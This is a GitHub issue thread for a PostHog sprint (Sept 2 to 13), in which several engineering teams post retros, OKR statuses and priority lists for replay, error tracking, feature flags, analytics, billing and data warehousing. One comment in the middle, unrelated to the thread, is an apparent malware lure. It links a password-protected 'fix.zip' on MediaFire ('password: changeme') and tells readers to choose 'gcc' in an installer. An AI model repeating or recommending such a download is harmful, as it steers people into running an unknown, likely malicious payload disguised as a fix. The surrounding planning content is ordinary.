### ISSUE TITLE
Sprint - Sept 2 to Sept 13

### ISSUE THREAD

**Issue by daibhin** [PostHog/posthog#24633]
# Global Sprint Planning

## 3 things that might take us down

1.
2.
3.

## Urgent incident follow-ups

https://github.com/orgs/PostHog/projects/103/views/2

# Team sprint planning

For your team sprint planning copy this template into a comment below for each team.

```
# Team ___

**Support hero:** ___

## Retro

<!-- Grab the high and low priority items from last time and add whether that item was completed or not -->

- 

## Hang over items from previous sprint

<!-- For each item, decide to re-prioritise (and add below) or deprioritise -->

- Item 1. prioritised/deprioritise

## OKR

1. OKR, status (red/yellow/green) and action points if yellow/red


### High priority

-

### Low priority / side quests

-

```

**Comment by daibhin** [comment]
# Team Replay

**Support hero:** @pauldambra  

- @annikaschmid - 1 week
- @neilkakkar - travelling 2 days

## Retro
@marandaneto CS team helping a lot more with triage. Leaves more time to focus on technical investigations
@daibhin error tracking has some momentum again. Neil working on Python & Ben helping with errors
@neilkakkar nice to be back and productive

### High priority

✅ done
🟢 in progress, on track
🟡 in progress, off track
🔴 missed

### High priority

- ✅ Onboard @neilkakkar into the team
- 🔴 Network logs not capturing everything @pauldambra 
  - Ticket investigated. Back & forth with customer but no resolution as of yet
- 🟡 React Native session recording @marandaneto 
  - Progressing. Hoping it will be done. Copy & paste snippets
- 🔴 Masking and redacting Jetpack Compose views, [issue](https://github.com/PostHog/posthog-android/issues/158) @marandaneto 
  - Focused on iOS blank screen issue

#### Error tracking
- 🔴 Alpha release @daibhin 
  - error query is super slow. No limit. Need rewrite as a subquery
- 🟡 Alerting v1 @daibhin / @benjackwhite 
  - Made a bunch of progress with CDP. Hoping to figure out PG write backs by end of the week
- Build out SDK support 
  - 🟢 Manual capture methods for JS and Python SDKs @daibhin 
  - 🟢 Exception auto capture - Python - @neilkakkar
    - Django integration was something we hadn't anticipated
- 🔴 Demangling stack traces - @pauldambra
  - Speculative to begin with. Not something we're going to focus on for now

### Low priority / side quests

- 🔴 replay bug investigation tooling @pauldambra 
	- Dropped in favour of more important
- ✅ convert session recording filtering to `RecordingsQuery` @daibhin 
- 🟢 Flutter web using WebASM @marandaneto 
- 🔴 Sample recordings, [issue](https://github.com/PostHog/posthog/issues/8182) @daibhin 
- 🔴 Hire iOS Engineer @marandaneto 
  - pushed back to Q4
- ✅ Mobile session replay user interviews @marandaneto @annikaschmid 
- 🟡 SwiftUI issues, [one] [two](https://github.com/PostHog/posthog-ios/issues/163) @marandaneto
  - Investigated but don't see a way to resolve


## OKR

1. OKR, status (red/yellow/green) and action points if yellow/red

- 📱Goal 1: People think of PostHog as a mobile solution 🟡
- 🪲 Goal 2: Error tracking in people's hands 🟢
- ⁉️ Goal 3: Hiring ✅
  - Neil's joining the team! 🟢
  - iOS Engineer 🔴

### High priority

- 🔴 Masking and redacting Jetpack Compose views, [issue](https://github.com/PostHog/posthog-android/issues/158) @marandaneto 
- Support person_profiles in Android and iOS @marandaneto 
-  RN session replay more automatic via npm, not copying code snippets @marandaneto 

- Long session bug investigation @pauldambra (?)

#### Error tracking
- Integrate session recordings into error playlist @neilkakkar

- UI improvements
  - Filter by assignee @daibhin
  - Archiving @daibhin

- Alerting v1 @daibhin
  - Customizable alerting configuration (snoozing / ignoring)

- Stack traces...

### Low priority / side quests
- Review Replay UX issues & decide on quick wins @daibhin 
- Filtering internal users (PoE confusion)

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by benjackwhite** [comment]
# Team Infrared

## Retro / hangover

- 🔴 Add to django capture logging of payload shapes to determine long tail issues stopping us migrating to rust capture.
- 🟢 Migrate to rust capture for replay @frankh 
- 🟢 Much better autoscaling for Mr Blobby - now it finally scales to match batch utilzation well
  - On for EU, will roll out for US
- 🟡 Migrate analytics to warpstream @danielxnj
  - Some pauses here as we wanted to be sure about issues around replay ingestion and some other configuration checks
  - Mirroring and ingestion is configured and ready
  - Delaying this to Q4 for actual rollout due to people availability
  - Clickhouse <> Warpstream stuff all seems fine

## OKR

1.  🦹 Zero-trust security 🟢 
2. 🤓 10x Developer Experience 🟡 
3. 💪 Every service lives and dies alone 🟢 
4. 💰 Save big on cost 🟡 

### High priority

- AWS costs exercise @frankh 
- Write up a plan for how we will migrate Warpstream later @danielxnj 
- Operational "handover" of working with infra world @frankh -> @Daesgar  
- Comply with blockage of IPs from Russia @frankh  
  - Add a region block notice to Django
  - Block if not logged in on all endpoints redirecting to page explaining why
  - If logged in also block but with team override (or something)
- PostHog JS - deploy its own assets @danielxnj 
  - Move away from posthog being the source of truth for JS assets to `posthog-js` 
- ArgoCD? @danielxnj 
  - Get the installation up to date on management cluster connected to all envs
  - Get one service deploying to dev (and prod envs as far as possible)

**Comment by Phanatic** [comment]
# Team Feature Success

**Support hero:** @jurajmajerik  

## Retro
- Customer support : 
   * Hospitable and Tools for humanity had the most issues opened this sprint.
   * Easier than last time. 
   * Customers were asking about confusion re: why feature flags were evaluated as they were.
   *  Multiple questions about overriding feature flags on the client.

⌛  No-code experiments : @Phanatic 
✅  Customer Support, build some metrics @Phanatic 
✅  Fixing request parser errors: @dmarticus 
✅  Define mid-term success for feature flags rewrite: @dmarticus
✅  Experiment confidence intervals @jurajmajerik 
⌛ Release the winning variant

### Side Quests

- Updated Go SDK to support fallbacks to `/decide` endpoints if the Personal API key isn't provided, stood up CI and auto-versioning for this lib, and worked with some customers to merge in 3 new PRs to make the SDK better (good thing we got CI stood up before that!) @dmarticus 
- fixed [this person popover bug](https://posthog.slack.com/archives/C0113360FFV/p1723155195487679) @dmarticus 
- [fixed the LemonInputSelector component](https://github.com/PostHog/posthog/pull/24301) that users were tweeting about @dmarticus 

---

## OKRs

1. Make sure feature flags can handle 10x current scale
2. No-code experiments
~3. Split out experiments into its own product~

### High priority
- No-code experiments : @Phanatic 
- Feature flags rust rewrite, support person & group properties overrides : @dmarticus 
- Supporting multiple experiment goals : @jurajmajerik

**Comment by annaszell** [comment]
# Team Analytics of the Product

**Support hero:** Michael (& Anirudh) + Sandy (& Michael)
**Off:** Thomas & Julian on parental leave,  Anirudh out for 2 days

## Retro

- 🟡 Alpha version of AI search-like querying for internal testing on Cloud – @skoob13 @Twixes
- 🟢 Reliability metrics – @anirudhpillai
- 🟢 Analytics alerts for internal PostHog dogfooding – @webjunkie 
- 🔴 Simplify group analytics billing with @raquelmsmith – @Twixes
- 🍋‍🟩 Fix the funnel querying issues affecting high-value customers – @aspicer
- 🟢 Cache warming for all recently viewed shared insights - @webjunkie 

## OKR

1. Rock-solid analytics (@thmsobrmlr  + @webjunkie  + @aspicer  + @anirudhpillai)
    1. 🟢 Legacy Minus – removing legacy insights code so that we can move fast
    1. 🟠 Tests Plus – shipping fewer bugs in the first place.
    1. 🍋‍🟩 Metrics Plus – catching issues before users report
    1. 🟡 Performance Plus - eliminating UX pain via maximum query performance/reliability, based on Metrics Plus data
    1. 🟢 Support Plus – sparking joy for users when they’re led to report a bug
1. Answering more product questions, deeper (@thmsobrmlr + @webjunkie + @aspicer + @anirudhpillai)
    1. 🔴 Growth Plus - increasing ease of onboarding, and subsequent retention
    1. 🟡 Analysis Plus - answering more product questions, more deeply
1. 🟡 ArtificialHog (@Twixes + @skoob13) – an LLM-based chat-like interface for answering product questions.

### High priority

- Alpha version of AI search-like querying for internal testing on Cloud @skoob13 @Twixes 
- Analytics experience dashboard - @anirudhpillai 
- Fix internal user filtering issue - @aspicer 

### Low priority / side quests

- Testing & deploying new funnels code - @aspicer 
- Home Depot feature requests - @anirudhpillai 
- Upgrade to django 5

**Comment by raquelmsmith** [comment]
# Team Growth

## Retro
<details>  
<summary>Retro items</summary>


- @raquelmsmith 
    - [x] Personless default RFC
    - [ ] Flag-specific proxy url - waiting on ben/infra for final solution
    - [ ] ~Start on https://github.com/PostHog/company-internal/issues/1452 ~
    - [ ] ~Fix error that happens after creation, merge https://github.com/PostHog/posthog/pull/23069~
	- [ ] Set up billing alerts
    	- [x] 500s
    	- [ ] What else do we want here? Celery queues?
	- [ ] ~Add LLM usage to usage reports for Lior~
	- [x] https://github.com/PostHog/posthog-js/pull/1370

This is probably too much for this sprint.. listed in roughly priority order

- @zlwaterfield
	- [x] Finish up billing limit migration
	- [ ] ~Get the first version for subscription interval support out~
	- [ ] ~Complete pre-work for teams annual plans around multiple stripe customers/subscriptions~
	- [ ] ~Get teams annual plan in prod (behind flag)~
	- [x] Make a plan for self-serve annual commitments (and start on some changes for it)
	- [x] Work w/ Mine to get ICP score flowing back into PostHog
	- [x] Work w/ Infra to get Celery using keda and new queues for rate limiting changes

Other things on the go
- [ ]  migrate from fully free session replay plans
- [ ]  migration from mailgun to customer.io w/ Joe

</details>  

## Q3 Goals
✅=finished 🟡=in progress 🔴=won't finish ⚪=not started
1. 🟡 Make onboarding awesome for Product analytics and Data warehouse (Raquel)
2. 🟡 Support self-serve annual commitments (Zach)
3. 🟡 Dive into the data to understand our billing metrics and customers better (Zach)
4. ✅ Launch pricing for data warehouse (Raquel)
5. 🟡 Hire 2 people (one for billing, one for product focus)

## This sprint

Time off: 

- @zlwaterfield - 1/2 day
	- [x] Session replay migration from free plans
	- [x] Fix the off by one error for annual credits mrr splits
	- [ ] Self serve annual credits - get v1 done and behind a feature flag in productions (without the monthly distributions yet)
	- [ ] Update + design self serve annual credits monthly distributions
	- [ ] Confirm ICP scoring data from Mine and start deeper analysis
	- [ ] Email churned subscribers (on going)
	- [x] Don't auto turn of group analytics and data pipelines
	- [ ] Shadow 1-2 technicals, move Google doc for arch technical into https://github.com/PostHog/interview-test and add more context on answers. Improve some of the grammar in the challenge. 

- @raquelmsmith 
	- [ ] Fix `invoice.mrr` not being used for invoice_with_annual table 
	- [x] Fix cypress test ffailures (phani actually figured it out)
    - [ ] Implement Personless default switch
    - [ ] Start on https://github.com/PostHog/company-internal/issues/1452 
    - [ ] Take another stab at SAML tests
    - [ ] RFC for enterprise plan
    - [ ] Fix error that happens after creation, merge https://github.com/PostHog/posthog/pull/23069
	- [ ] Add LLM usage to usage reports for Lior
	- [ ] Move all activation metrics to backend tracking

**Comment by robbie-c** [comment]
# Team Analytics of the Web
**Support hero:** @robbie-c 

## Retro

🟢 Conversion events tile
🔴 Page-level conversion goals
🔴 Save web analytics page state
-
🟢 Get US onto sessions v2
🟢 Test sessions v2 perf hack with team 2 (its's 40% faster)
🟢 Fix posthog-js CI
🟢 Improve posthog-js bot detection

## OKR

1. Make querying fast enough for large customers
2. Heavily requested features
3. Work better with other products
4. Product and growth

### High priority
- Page level conversion goals
- Doc updates
  - Cross domain tracking
  - Changes to attribution
- Delete v1 sessions table after US people have been on v2 for ~a week without incident.
- Add event count map to sessions v2
- Start backfilling the 4 new columns in sessions v2 (will likely take a few weekends)

**Comment by benjackwhite** [comment]
# Team Century Data Properties (CDP)

Support: @benjackwhite 

## Retro

- 🟡 Release Feature Preview and then general availability of Hog Functions @benjackwhite 
- 🟡 Pricing plan for new functions so that we can actually migrate things over to it
  - Will stick with existing pricing - just need special template to migrate existing customers who were using free action webhooks
- 🟢 Implement [lambdas/closures](https://github.com/PostHog/posthog/pull/24369), add missing STL functions, and support all element property filters @mariusandra
- 🟢 Support Replay team with Exception alerts using HogFunctions @benjackwhite @mariusandra 
- 🟡 Get duplicate service up and running on Cyloctron so we can test team by team 
  - Most things are there and ready to go, just missing plugin-server side to actually hook into it
- 🟡 Property/Event definitions off the critical path @oliverb123 
  - Tuning and testing of the running service to make sure it works as expected


## OKR
(to be refactored)

### High priority

- Metrics side of cyclotron @bretthoerner 
  - Dead letter depth
  - Queue depth
  - Anything else we can think of
- Roll out rust Property/Event definitions service @oliverb123
- Get the new hog services running in a way that is ready to test cyclotron @benjackwhite 
- Wrapping up remaining list of Destination UX work to get it rolled out @mariusandra

**Comment by EDsCODE** [comment]
# Team Data <->
### OKR Q2 2024

### Objective

**Query 3000**

* **Key Results:**
    * Autocomplete
	* Increase general BI experience/product https://github.com/PostHog/meta/issues/157
	* Declutter the data warehouse UI and make the features intuitive to find

**Data Modeling MVP**

* **Key Results:**
	* Infrastructure decided and implemented
	* Integrating external data with feature flags
	* External data everywhere in insights/persons/cohorts
	* Get billing team to use modeling in posthog for their invoices_with_annual table
 
### Retro

- [x] Data Modeling MVP/experimentation. Backend foundation is in place. Prioritize UI and materialization layer @tomasfarias @EDsCODE 
- [ ] Batch exports support catch up @tomasfarias 
- [x] Continued quality improvements with data warehousing @Gilbert09 
	- more integrations
	- monitoring/improving compaction work
	- first class credential support

### High Priority
- [ ] release data modeling beta
	- finish out UI @EDsCODE 
	- first pass of materialization @tomasfarias 
- Quality improvements
	- [ ] first class credential support
	- [ ] schema realignment when it's changed for a source (new schema or postgres table etc.)
	- [ ] high priority customer support (

### Needs addressing
- can't guarantee clickhouse distributed table lag will always be stable so batch exports has a chance at missing events
